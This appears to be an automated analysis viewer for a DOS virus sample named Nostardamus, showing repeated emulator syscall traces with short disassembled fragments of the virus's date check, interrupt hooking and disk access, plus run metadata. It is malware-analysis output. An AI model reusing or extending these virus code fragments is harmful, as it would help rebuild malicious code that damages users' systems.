Sample viewer

vx.netlux.org/Virus.DOS.Nostardamus.3072.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:47.386779785Z 42 PC: 1300b | Get date 0x1300b: inc al
0x1300d: shl al, 1
0x1300f: cmp dl, al
0x13011: jne 0x13046
0x13013: mov ah, 0x13
0x13015: int 0x2f
0x13017: push ds
0x13018: push dx
0x13019: mov ah, 0x13
0x1301b: int 0x2f
0x1301d: pop dx
0x1301e: pop ds
0x1301f: mov ax, 0x2513
0x13022: int 0x21
0x13024: mov cx, 1
0x13027: mov dx, 0x580
0x1302a: mov ax, 0x308
0x1302d: int 0x13
0x1302f: jb 0x1303e
0x13031: dec dh

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13326,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:05.369106142Z 42 PC: 1300b | Get date 0x1300b: inc al
0x1300d: shl al, 1
0x1300f: cmp dl, al
0x13011: jne 0x13046
0x13013: mov ah, 0x13
0x13015: int 0x2f
0x13017: push ds
0x13018: push dx
0x13019: mov ah, 0x13
0x1301b: int 0x2f
0x1301d: pop dx
0x1301e: pop ds
0x1301f: mov ax, 0x2513
0x13022: int 0x21
0x13024: mov cx, 1
0x13027: mov dx, 0x580
0x1302a: mov ax, 0x308
0x1302d: int 0x13
0x1302f: jb 0x1303e
0x13031: dec dh

{"DateBased":true,"Day":10,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13326,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:05.56956623Z 42 PC: 1300b | Get date 0x1300b: inc al
0x1300d: shl al, 1
0x1300f: cmp dl, al
0x13011: jne 0x13046
0x13013: mov ah, 0x13
0x13015: int 0x2f
0x13017: push ds
0x13018: push dx
0x13019: mov ah, 0x13
0x1301b: int 0x2f
0x1301d: pop dx
0x1301e: pop ds
0x1301f: mov ax, 0x2513
0x13022: int 0x21
0x13024: mov cx, 1
0x13027: mov dx, 0x580
0x1302a: mov ax, 0x308
0x1302d: int 0x13
0x1302f: jb 0x1303e
0x13031: dec dh
2018-12-25T12:38:05.582118454Z 37 PC: 13024 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')